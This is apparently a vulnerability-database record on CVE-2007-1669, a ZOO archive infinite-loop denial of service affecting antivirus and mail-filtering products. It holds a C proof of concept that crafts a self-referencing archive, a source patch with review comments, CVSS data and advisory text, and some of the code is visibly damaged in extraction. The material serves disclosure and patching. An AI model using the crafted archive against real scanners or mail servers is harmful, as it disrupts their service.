define ZOO_HEADER_SIZE 0x0000002a

define ZH_TEXT 0

define ZH_TAG 20

define ZH_START_OFFSET 24

define ZH_NEG_START_OFFSET 28

define ZH_MAJ_VER 32

define ZH_MIN_VER 33

define ZH_ARC_HTYPE 34

define ZH_ARC_COMMENT 35

define ZH_ARC_COMMENT_LENGTH 39

define ZH_VERSION_DATA 41

define D_DIRENTRY_LENGTH 56

define D_TAG 0

define D_TYPE 4

define D_PACKING_METHOD 5

// Field holding the file offset of the next directory entry. This is the value
// a parser has to validate before seeking (see the patch in section VII).
define D_NEXT_ENTRY 6

define D_OFFSET 10

define D_DATE 14

define D_TIME 16

define D_FILE_CRC 18

define D_ORIGINAL_SIZE 20

define D_SIZE_NOW 24

define D_MAJ_VER 28

define D_MIN_VER 29

define D_DELETED 30

define D_FILE_STRUCT 31

define D_COMMENT_OFFSET 32

define D_COMMENT_SIZE 36

define D_FILENAME 38

define D_VAR_DIR_LEN 51

define D_TIMEZONE 53

define D_DIR_CRC 54

// Offsets just past the fixed-length part of the entry; defined here but not
// referenced by main().
define D_NAMLEN ( D_DIRENTRY_LENGTH + 0 )

define D_DIRLEN ( D_DIRENTRY_LENGTH + 1 )

define D_LFILENAME ( D_DIRENTRY_LENGTH + 2 )

// Store a single byte value.
// NOTE(review): as printed, ptr is a plain char passed by value, so the
// assignment only changes the local copy. The listing looks extraction-damaged;
// confirm against the original advisory before relying on it.
void put_byte (char ptr, unsigned char data) { ptr = data; }

// Write a 16-bit value as two bytes, least significant byte first:
// data goes to ptr and data >> 8 to ptr + 1, each through put_byte.
void put_word (char *ptr, unsigned short data) { put_byte (ptr, data); put_byte (ptr + 1, data >> 8); }

// Write a 32-bit value as four bytes, least significant byte first:
// data, data >> 8, data >> 16 and data >> 24 go to ptr .. ptr + 3 through put_byte.
void put_longword (char *ptr, unsigned long data) { put_byte (ptr, data); put_byte (ptr + 1, data >> 8); put_byte (ptr + 2, data >> 16); put_byte (ptr + 3, data >> 24); }

// Open filename for writing (mode "w") and return the stream.
// On failure, prints the system error through perror and terminates the
// process with exit status 1, so the caller never sees a NULL stream.
FILE * open_file (char *filename) {

     FILE *fp;

     fp = fopen ( filename , "w" );

     if (!fp) {
             perror ("Cant open file");
             exit (1);
     }

     return fp;

}

// Print the one-line usage text, with progname as the command name, and
// terminate the process with exit status 1. Does not return.
void usage (char *progname) {

     printf ("\nTo use:\n");
     printf ("%s <archive name>\n\n", progname);

     exit (1);

}

// Builds a minimal ZOO archive image in a 4096-byte buffer and writes the first
// ZOO_HEADER_SIZE + 51 bytes of it to the file named by argv[1].
// The single directory entry sits at offset ZOO_HEADER_SIZE (0x2a) and its
// next-entry field is also set to 0x2a, so the entry's chain pointer refers back
// to the entry itself. For a defender this is the pattern to reject: a next
// offset that is not strictly greater than the offset of the entry being
// processed, which is the check the patch in section VII adds.
// NOTE(review): the declaration line below is extraction-damaged and does not
// compile as shown.
int main (int argc, char argv[]) { FILE fp; char hdr = (char ) malloc (4096); char filename = (char ) malloc (256); int written_bytes; int total_size;

     // Exactly one argument (the output file name) is required; usage() exits.
     if ( argc != 2) {
             usage ( argv[0] );
     }

     // Copies at most 255 bytes of the name into the 256-byte buffer.
     // NOTE(review): filename is written here before the allocation check below.
     strncpy (filename, argv[1], 255);

     if (!hdr || !filename) {
             perror ("Error allocating memory");
             exit (1);
     }

     // Zero the whole buffer so every field not set below is 0.
     memset (hdr, 0x00, 4096);

     // Build a ZOO header
     memcpy          (hdr + ZH_TEXT, "ZOO 2.10 Archive.\032", 18);
     put_longword    (hdr + ZH_TAG, 0xfdc4a7dc);
     // Start offset of the first directory entry, followed by its negation.
     put_longword    (hdr + ZH_START_OFFSET, ZOO_HEADER_SIZE);
     put_longword    (hdr + ZH_NEG_START_OFFSET,
         (ZOO_HEADER_SIZE) * -1);
     put_byte        (hdr + ZH_MAJ_VER, 2);
     put_byte        (hdr + ZH_MIN_VER, 0);
     put_byte        (hdr + ZH_ARC_HTYPE, 1);
     put_longword    (hdr + ZH_ARC_COMMENT, 0);
     put_word        (hdr + ZH_ARC_COMMENT_LENGTH, 0);
     put_byte        (hdr + ZH_VERSION_DATA, 3);

     // Build vulnerable direntry struct
     put_longword    (hdr + ZOO_HEADER_SIZE + D_TAG, 0xfdc4a7dc);
     put_byte        (hdr + ZOO_HEADER_SIZE + D_TYPE, 1);
     put_byte        (hdr + ZOO_HEADER_SIZE + D_PACKING_METHOD, 0);
     // 0x2a equals ZOO_HEADER_SIZE, i.e. the offset of this same entry.
     put_longword    (hdr + ZOO_HEADER_SIZE + D_NEXT_ENTRY, 0x2a);
     put_longword    (hdr + ZOO_HEADER_SIZE + D_OFFSET, 0x71);
     put_word        (hdr + ZOO_HEADER_SIZE + D_DATE, 0x3394);
     put_word        (hdr + ZOO_HEADER_SIZE + D_TIME, 0x4650);
     put_word        (hdr + ZOO_HEADER_SIZE + D_FILE_CRC, 0);
     put_longword    (hdr + ZOO_HEADER_SIZE + D_ORIGINAL_SIZE, 0);
     put_longword    (hdr + ZOO_HEADER_SIZE + D_SIZE_NOW, 0);
     put_byte        (hdr + ZOO_HEADER_SIZE + D_MAJ_VER, 1);
     put_byte        (hdr + ZOO_HEADER_SIZE + D_MIN_VER, 0);
     put_byte        (hdr + ZOO_HEADER_SIZE + D_DELETED, 0);
     put_byte        (hdr + ZOO_HEADER_SIZE + D_FILE_STRUCT, 0);
     put_longword    (hdr + ZOO_HEADER_SIZE + D_COMMENT_OFFSET, 0);
     put_word        (hdr + ZOO_HEADER_SIZE + D_COMMENT_SIZE, 0);
     memcpy          (hdr + ZOO_HEADER_SIZE + D_FILENAME,
                         "AAAAAAAA.AAA", 13);

     // Header plus the first 51 bytes of the entry; 51 is the value of
     // D_VAR_DIR_LEN, so the output ends where that field would begin.
     total_size = ZOO_HEADER_SIZE + 51;

     fp = open_file (filename);

     // Any non-zero count returned by fwrite is reported as success.
     if ( (written_bytes = fwrite ( hdr, 1, total_size, fp)) != 0 ) {
             printf ("The file has been written\n");
     } else {
             printf ("Cant write to the file\n");
             exit (1);
     }

     fclose (fp);

     return 0;

}

VII. PATCH

To fix this issue, ensure that the offset of the next file to process is always greater than the one you are currently processing. This will guarantee the fact that it's not possible to process the same files over and over again. Here is a patch for the software zoo version 2.10 distributed with many UNIX systems:

diff -u zoo/zooext.c zoo-patched/zooext.c --- zoo/zooext.c 1991-07-11 15:08:00.000000000 -0400 +++ zoo-patched/zooext.c 2007-03-16 16:45:28.000000000 -0500 @@ -89,6 +89,7 @@ #endif struct direntry direntry; / directory entry / int first_dir = 1; / first dir entry seen? / +unsigned long zoo_pointer = 0; / Track our position in the file /

static char extract_ver[] = "Zoo %d.%d is needed to extract %s.\n"; static char no_space[] = "Insufficient disk space to extract %s.\n"; @@ -169,6 +170,9 @@ exit_status = 1; } zooseek (zoo_file, zoo_header.zoo_start, 0); / seek to where data begins / + + / Begin tracking our position in the file / + zoo_pointer = zoo_header.zoo_start; }

#ifndef PORTABLE @@ -597,6 +601,12 @@ } / end if /

loop_again: + + / Make sure we are not seeking to already processed data / + if (next_ptr <= zoo_pointer) + prterror ('f', "ZOO chain structure is corrupted\n"); + zoo_pointer = next_ptr; + zooseek (zoo_file, next_ptr, 0); / ..seek to next dir entry / } / end while /
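Review bot: The guard `if (next_ptr <= zoo_pointer)` compares against `zoo_pointer`, which this patch declares as `unsigned long`, while the declaration of `next_ptr` is outside the hunk. If it is a signed `long`, a negative offset read from the archive converts to a large unsigned value and passes the check before it reaches `zooseek`. Rejecting negative values first, as in `if (next_ptr < 0 || (unsigned long) next_ptr <= zoo_pointer)`, would close that gap; the same applies to the `direntry.next` check added in zoolist.c. The enclosing loop starts outside the hunk, so how the end-of-chain entry is handled before this check runs cannot be confirmed from here.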

diff -u zoo/zoolist.c zoo-patched/zoolist.c --- zoo/zoolist.c 1991-07-11 15:08:04.000000000 -0400 +++ zoo-patched/zoolist.c 2007-03-16 16:45:20.000000000 -0500 @@ -92,6 +92,7 @@ int show_mode = 0; / show file protection / #endif int first_dir = 1; / if first direntry -- to adjust dat_ofs / +unsigned long zoo_pointer = 0; / Track our position in the file /

while (option) { switch (option) { @@ -211,6 +212,9 @@ show_acmt (&zoo_header, zoo_file, 0); / show archive comment / }

  • / Begin tracking our position in the file /
  • zoo_pointer = zoo_header.zoo_start; + / Seek to the beginning of the first directory entry / if (zooseek (zoo_file, zoo_header.zoo_start, 0) != 0) { ercount++; @@ -437,6 +441,11 @@ if (verb_list && !fast) show_comment (&direntry, zoo_file, 0, (char ) NULL); } / end if (lots of conditions) */ +
  • / Make sure we are not seeking to already processed data /
  • if (direntry.next <= zoo_pointer)
  • prterror ('f', "ZOO chain structure is corrupted\n");
  • zoo_pointer = direntry.next;
             /* ..seek to next dir entry */
    zooseek (zoo_file, direntry.next, 0);
    

VIII. CREDITS

Jean-Sebastien Guay-Leroux found the bug and wrote the exploit for it.

IX. REFERENCES

  1. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1669

  2. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1670

  3. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1671

  4. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1672

  5. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1673

X. HISTORY

2006-09-?? : Vulnerability is found
2007-03-19 : All vendors notified
2007-03-19 : Barracuda Networks provided a fix
2007-03-22 : Avira provided a fix
2007-04-02 : Panda Antivirus provided a fix
2007-04-14 : avast! antivirus provided a fix
2007-05-04 : Public disclosure



{
   "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
      affected_products: {
         "@id": "https://www.variotdbs.pl/ref/affected_products",
      },
      configurations: {
         "@id": "https://www.variotdbs.pl/ref/configurations",
      },
      credits: {
         "@id": "https://www.variotdbs.pl/ref/credits",
      },
      cvss: {
         "@id": "https://www.variotdbs.pl/ref/cvss/",
      },
      description: {
         "@id": "https://www.variotdbs.pl/ref/description/",
      },
      exploit_availability: {
         "@id": "https://www.variotdbs.pl/ref/exploit_availability/",
      },
      external_ids: {
         "@id": "https://www.variotdbs.pl/ref/external_ids/",
      },
      iot: {
         "@id": "https://www.variotdbs.pl/ref/iot/",
      },
      iot_taxonomy: {
         "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/",
      },
      patch: {
         "@id": "https://www.variotdbs.pl/ref/patch/",
      },
      problemtype_data: {
         "@id": "https://www.variotdbs.pl/ref/problemtype_data/",
      },
      references: {
         "@id": "https://www.variotdbs.pl/ref/references/",
      },
      sources: {
         "@id": "https://www.variotdbs.pl/ref/sources/",
      },
      sources_release_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_release_date/",
      },
      sources_update_date: {
         "@id": "https://www.variotdbs.pl/ref/sources_update_date/",
      },
      threat_type: {
         "@id": "https://www.variotdbs.pl/ref/threat_type/",
      },
      title: {
         "@id": "https://www.variotdbs.pl/ref/title/",
      },
      type: {
         "@id": "https://www.variotdbs.pl/ref/type/",
      },
   },
   "@id": "https://www.variotdbs.pl/vuln/VAR-200705-0183",
   affected_products: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            model: "amavis",
            scope: "lte",
            trust: 1.8,
            vendor: "amavis",
            version: "2.4.1",
         },
         {
            model: "spam firewall",
            scope: "eq",
            trust: 0.8,
            vendor: "barracuda",
            version: "3.4 and later",
         },
         {
            model: "activescan",
            scope: "eq",
            trust: 0.6,
            vendor: "panda",
            version: "5.53",
         },
         {
            model: "spam firewall",
            scope: "eq",
            trust: 0.6,
            vendor: "barracuda",
            version: "3.3.3",
         },
         {
            model: "spam firewall",
            scope: "eq",
            trust: 0.6,
            vendor: "barracuda",
            version: "3.3.0.54",
         },
         {
            model: "spam firewall",
            scope: "eq",
            trust: 0.6,
            vendor: "barracuda",
            version: "3.3.03.055",
         },
         {
            model: "spam firewall",
            scope: "eq",
            trust: 0.6,
            vendor: "barracuda",
            version: "3.3.15.026",
         },
         {
            model: "spam firewall",
            scope: "eq",
            trust: 0.6,
            vendor: "barracuda",
            version: "3.1.18",
         },
         {
            model: "spam firewall",
            scope: "eq",
            trust: 0.6,
            vendor: "barracuda",
            version: "3.1.17",
         },
         {
            model: "spam firewall",
            scope: "eq",
            trust: 0.6,
            vendor: "barracuda",
            version: "3.4",
         },
         {
            model: "spam firewall",
            scope: "eq",
            trust: 0.6,
            vendor: "barracuda",
            version: "3.3.01.001",
         },
         {
            model: "spam firewall",
            scope: "eq",
            trust: 0.6,
            vendor: "barracuda",
            version: "3.3.03.053",
         },
         {
            model: "zoo",
            scope: "eq",
            trust: 0.3,
            vendor: "zoo",
            version: "2.10",
         },
         {
            model: "winace",
            scope: "eq",
            trust: 0.3,
            vendor: "winace",
            version: "2.605",
         },
         {
            model: "winace",
            scope: "eq",
            trust: 0.3,
            vendor: "winace",
            version: "2.5",
         },
         {
            model: "winace",
            scope: "eq",
            trust: 0.3,
            vendor: "winace",
            version: "2.60",
         },
         {
            model: "unzoo",
            scope: "eq",
            trust: 0.3,
            vendor: "unzoo",
            version: "4.4-2",
         },
         {
            model: "picozip",
            scope: "eq",
            trust: 0.3,
            vendor: "picozip",
            version: "4.0.2",
         },
         {
            model: "picozip",
            scope: "eq",
            trust: 0.3,
            vendor: "picozip",
            version: "4.0.1",
         },
         {
            model: "titanium antivirus antispyware",
            scope: "eq",
            trust: 0.3,
            vendor: "panda",
            version: "2006+",
         },
         {
            model: "titanium antivirus",
            scope: "eq",
            trust: 0.3,
            vendor: "panda",
            version: "2005",
         },
         {
            model: "platinum internet security",
            scope: "eq",
            trust: 0.3,
            vendor: "panda",
            version: "20070",
         },
         {
            model: "platinum internet security",
            scope: "eq",
            trust: 0.3,
            vendor: "panda",
            version: "2006",
         },
         {
            model: "antivirus platinum",
            scope: "eq",
            trust: 0.3,
            vendor: "panda",
            version: "2.0",
         },
         {
            model: "antivirus for netware",
            scope: "eq",
            trust: 0.3,
            vendor: "panda",
            version: "2.0",
         },
         {
            model: "activescan",
            scope: "eq",
            trust: 0.3,
            vendor: "panda",
            version: "5.54.1",
         },
         {
            model: "activescan",
            scope: "eq",
            trust: 0.3,
            vendor: "panda",
            version: "5.0",
         },
         {
            model: "networks barracuda spam firewall",
            scope: "eq",
            trust: 0.3,
            vendor: "barracuda",
            version: "3.3.15026",
         },
         {
            model: "networks barracuda spam firewall",
            scope: "eq",
            trust: 0.3,
            vendor: "barracuda",
            version: "3.1.18",
         },
         {
            model: "networks barracuda spam firewall",
            scope: "eq",
            trust: 0.3,
            vendor: "barracuda",
            version: "3.1.17",
         },
         {
            model: "networks barracuda spam firewall",
            scope: "eq",
            trust: 0.3,
            vendor: "barracuda",
            version: "3.3.03.055",
         },
         {
            model: "networks barracuda spam firewall",
            scope: "eq",
            trust: 0.3,
            vendor: "barracuda",
            version: "3.3.03.053",
         },
         {
            model: "networks barracuda spam firewall",
            scope: "eq",
            trust: 0.3,
            vendor: "barracuda",
            version: "3.3.03.022",
         },
         {
            model: "networks barracuda spam firewall",
            scope: "eq",
            trust: 0.3,
            vendor: "barracuda",
            version: "3.3.01.001",
         },
         {
            model: "networks barracuda spam firewall",
            scope: "eq",
            trust: 0.3,
            vendor: "barracuda",
            version: "3.3.0.54",
         },
         {
            model: "desktop for windows",
            scope: "eq",
            trust: 0.3,
            vendor: "avira",
            version: "1.00.00.68",
         },
         {
            model: "antivir workstation professional build",
            scope: "eq",
            trust: 0.3,
            vendor: "avira",
            version: "367",
         },
         {
            model: "antivir personaledition premium build",
            scope: "eq",
            trust: 0.3,
            vendor: "avira",
            version: "228",
         },
         {
            model: "antivir personaledition classic build",
            scope: "eq",
            trust: 0.3,
            vendor: "avira",
            version: "180",
         },
         {
            model: "antivir",
            scope: "eq",
            trust: 0.3,
            vendor: "avira",
            version: "6.35.00.00",
         },
         {
            model: "avast! linux home edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "1.0.5",
         },
         {
            model: "avast! linux home edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "1.0.5-1",
         },
         {
            model: "antivirus server edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.7.726",
         },
         {
            model: "antivirus server edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.7.676",
         },
         {
            model: "antivirus server edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.7.660",
         },
         {
            model: "antivirus server edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.566",
         },
         {
            model: "antivirus server edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.489",
         },
         {
            model: "antivirus server edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.460",
         },
         {
            model: "antivirus professional edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.7.844",
         },
         {
            model: "antivirus professional edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.7.827",
         },
         {
            model: "antivirus professional edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.691",
         },
         {
            model: "antivirus professional edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.665",
         },
         {
            model: "antivirus professional edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.652",
         },
         {
            model: "antivirus professional edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.603",
         },
         {
            model: "antivirus professional edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6",
         },
         {
            model: "antivirus professional edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.0",
         },
         {
            model: "antivirus managed client",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.394",
         },
         {
            model: "antivirus managed client",
            scope: null,
            trust: 0.3,
            vendor: "avast",
            version: null,
         },
         {
            model: "antivirus home edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.7.869",
         },
         {
            model: "antivirus home edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.7.844",
         },
         {
            model: "antivirus home edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.7.827",
         },
         {
            model: "antivirus home edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.691",
         },
         {
            model: "antivirus home edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.665",
         },
         {
            model: "antivirus home edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.655",
         },
         {
            model: "antivirus home edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6.652",
         },
         {
            model: "antivirus home edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.6",
         },
         {
            model: "antivirus home edition",
            scope: "eq",
            trust: 0.3,
            vendor: "avast",
            version: "4.0",
         },
      ],
      sources: [
         {
            db: "BID",
            id: "23823",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2007-001742",
         },
         {
            db: "NVD",
            id: "CVE-2007-1669",
         },
         {
            db: "CNNVD",
            id: "CNNVD-200705-120",
         },
      ],
   },
   configurations: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/configurations#",
         children: {
            "@container": "@list",
         },
         cpe_match: {
            "@container": "@list",
         },
         data: {
            "@container": "@list",
         },
         nodes: {
            "@container": "@list",
         },
      },
      data: [
         {
            CVE_data_version: "4.0",
            nodes: [
               {
                  children: [
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.01.001:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                           {
                              cpe23Uri: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.03.053:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                           {
                              cpe23Uri: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.1.18:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                           {
                              cpe23Uri: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.0.54:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                           {
                              cpe23Uri: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.1.17:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                           {
                              cpe23Uri: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.4:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                           {
                              cpe23Uri: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.03.055:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                           {
                              cpe23Uri: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.15.026:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                           {
                              cpe23Uri: "cpe:2.3:h:barracuda_networks:barracuda_spam_firewall:3.3.3:*:*:*:*:*:*:*",
                              cpe_name: [],
                              vulnerable: false,
                           },
                        ],
                        operator: "OR",
                     },
                     {
                        children: [],
                        cpe_match: [
                           {
                              cpe23Uri: "cpe:2.3:a:amavis:amavis:*:*:*:*:*:*:*:*",
                              cpe_name: [],
                              versionEndIncluding: "2.4.1",
                              vulnerable: true,
                           },
                        ],
                        operator: "OR",
                     },
                  ],
                  cpe_match: [],
                  operator: "AND",
               },
            ],
         },
      ],
      sources: [
         {
            db: "NVD",
            id: "CVE-2007-1669",
         },
      ],
   },
   credits: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/credits#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Jean-Sebastien Guay-Leroux is credited with discovering this issue.",
      sources: [
         {
            db: "BID",
            id: "23823",
         },
         {
            db: "CNNVD",
            id: "CNNVD-200705-120",
         },
      ],
      trust: 0.9,
   },
   cve: "CVE-2007-1669",
   cvss: {
      "@context": {
         cvssV2: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2",
         },
         cvssV3: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/",
         },
         severity: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/cvss/severity#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            cvssV2: [
               {
                  acInsufInfo: false,
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "NVD",
                  availabilityImpact: "COMPLETE",
                  baseScore: 7.8,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 10,
                  impactScore: 6.9,
                  integrityImpact: "NONE",
                  obtainAllPrivilege: false,
                  obtainOtherPrivilege: false,
                  obtainUserPrivilege: false,
                  severity: "HIGH",
                  trust: 1,
                  userInteractionRequired: false,
                  vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:C",
                  version: "2.0",
               },
               {
                  acInsufInfo: null,
                  accessComplexity: "Low",
                  accessVector: "Network",
                  authentication: "None",
                  author: "NVD",
                  availabilityImpact: "Complete",
                  baseScore: 7.8,
                  confidentialityImpact: "None",
                  exploitabilityScore: null,
                  id: "CVE-2007-1669",
                  impactScore: null,
                  integrityImpact: "None",
                  obtainAllPrivilege: null,
                  obtainOtherPrivilege: null,
                  obtainUserPrivilege: null,
                  severity: "High",
                  trust: 0.8,
                  userInteractionRequired: null,
                  vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:C",
                  version: "2.0",
               },
               {
                  accessComplexity: "LOW",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "VULHUB",
                  availabilityImpact: "COMPLETE",
                  baseScore: 7.8,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 10,
                  id: "VHN-25031",
                  impactScore: 6.9,
                  integrityImpact: "NONE",
                  severity: "HIGH",
                  trust: 0.1,
                  vectorString: "AV:N/AC:L/AU:N/C:N/I:N/A:C",
                  version: "2.0",
               },
            ],
            cvssV3: [],
            severity: [
               {
                  author: "NVD",
                  id: "CVE-2007-1669",
                  trust: 1.8,
                  value: "HIGH",
               },
               {
                  author: "CNNVD",
                  id: "CNNVD-200705-120",
                  trust: 0.6,
                  value: "HIGH",
               },
               {
                  author: "VULHUB",
                  id: "VHN-25031",
                  trust: 0.1,
                  value: "HIGH",
               },
            ],
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-25031",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2007-001742",
         },
         {
            db: "NVD",
            id: "CVE-2007-1669",
         },
         {
            db: "CNNVD",
            id: "CNNVD-200705-120",
         },
      ],
   },
   description: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/description#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "zoo decoder 2.10 (zoo-2.10), as used in multiple products including (1) Barracuda Spam Firewall 3.4 and later with virusdef before 2.0.6399, (2) Spam Firewall before 3.4 20070319 with virusdef before 2.0.6399o, and (3) AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file. The zoo decoder is used in products such as (1) Barracuda Spam Firewall, (2) Spam Firewall, and (3) AMaViS. The Zoo compression algorithm is prone to a remote denial-of-service vulnerability. This issue arises when applications implementing the Zoo algorithm process certain malformed archives. \nA successful attack can exhaust system resources and trigger a denial-of-service condition. \nThis issue affects Zoo 2.10 and other applications implementing the vulnerable algorithm. \n\n----------------------------------------------------------------------\n\nTry a new way to discover vulnerabilities that ALREADY EXIST in your\nIT infrastructure. \n\nJoin the FREE BETA test of the Network Software Inspector (NSI)!\nhttp://secunia.com/network_software_inspector/\n\nThe NSI enables you to INSPECT, DISCOVER, and DOCUMENT\nvulnerabilities in more than 4,000 different Windows applications. \n\nThe vulnerability is caused due to an error in the handling of Zoo\narchives. This can be exploited to cause an infinite loop resulting\nin high CPU utilisation. \n\nSOLUTION:\nUpdate to firmware version 3.4 and virus definition 2.0.6399 or\nlater. 
\n\nPROVIDED AND/OR DISCOVERED BY:\nJean-Sebastien Guay-Leroux\n\nORIGINAL ADVISORY:\nBarracuda Networks:\nhttp://www.barracudanetworks.com/ns/resources/tech_alert.php\n\nJean-Sebastien Guay-Leroux:\nhttp://www.guay-leroux.com/projects/zoo-infinite-advisory.txt\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. Topic:                  Multiple vendors ZOO file decompression infinite\n                         loop DoS\n\nAnnounced:              2007-05-04\nCredits:                Jean-Sebastien Guay-Leroux\nProducts:               Multiple (see section III)\nImpact:                 DoS (99% CPU utilisation)\nCVE ID:                 CVE-2007-1669, CVE-2007-1670, CVE-2007-1671,\n                         CVE-2007-1672, CVE-2007-1673\n\n\nI.      BACKGROUND\n\nZoo is a compression program and format developed by Rahul Dhesi in the mid\n1980s. The format is based on the LZW compression algorithm and compressed\nfiles are identified by the .zoo file extension. \n\n\nII.  The vulnerability lies in the algorithm used to locate the\nfiles inside the archive.  
Each file in a ZOO archive is identified by a\ndirentry structure.  Those structures are linked between themselves with a\n'next' pointer.  This pointer is in fact an offset from the beginning of\nthe file, representing the next direntry structure.  By specifying an\nalready processed file, it's possible to process more than one time this\nsame file.  The ZOO parser will then enter an infinite loop condition. \n\n\nIII.    AFFECTED SOFTWARES\n\no Barracuda Spam Firewall\no Panda Software Antivirus\no avast! antivirus\no Avira AntiVir\no zoo-2.10\no unzoo.c\no WinAce\no PicoZip\n\n\nIV.     IMPACT\n\nIf this attack is conducted against a vulnerable antivirus, the host system\nwill have its CPU at 100% utilization and may have problems answering other\nrequests. \n\nIf this attack is conducted against an SMTP content filter running a\nvulnerable ZOO implementation, legitimate clients may be unable to send and\nreceive email through this server. \n\n\nV.      SOLUTION\n\no Barracuda Spam Firewall - CVE-2007-1669:\n   They fixed this problem in virusdef 2.0.6399 for firmware >= 3.4 and\n   2.0.6399o for firmware < 3.4 March 19th 2007. \n\no Panda Software Antivirus - CVE-2007-1670:\n   They fixed this problem April 2nd 2007. \n\no avast! antivirus - CVE-2007-1672:\n   They fixed this problem in version 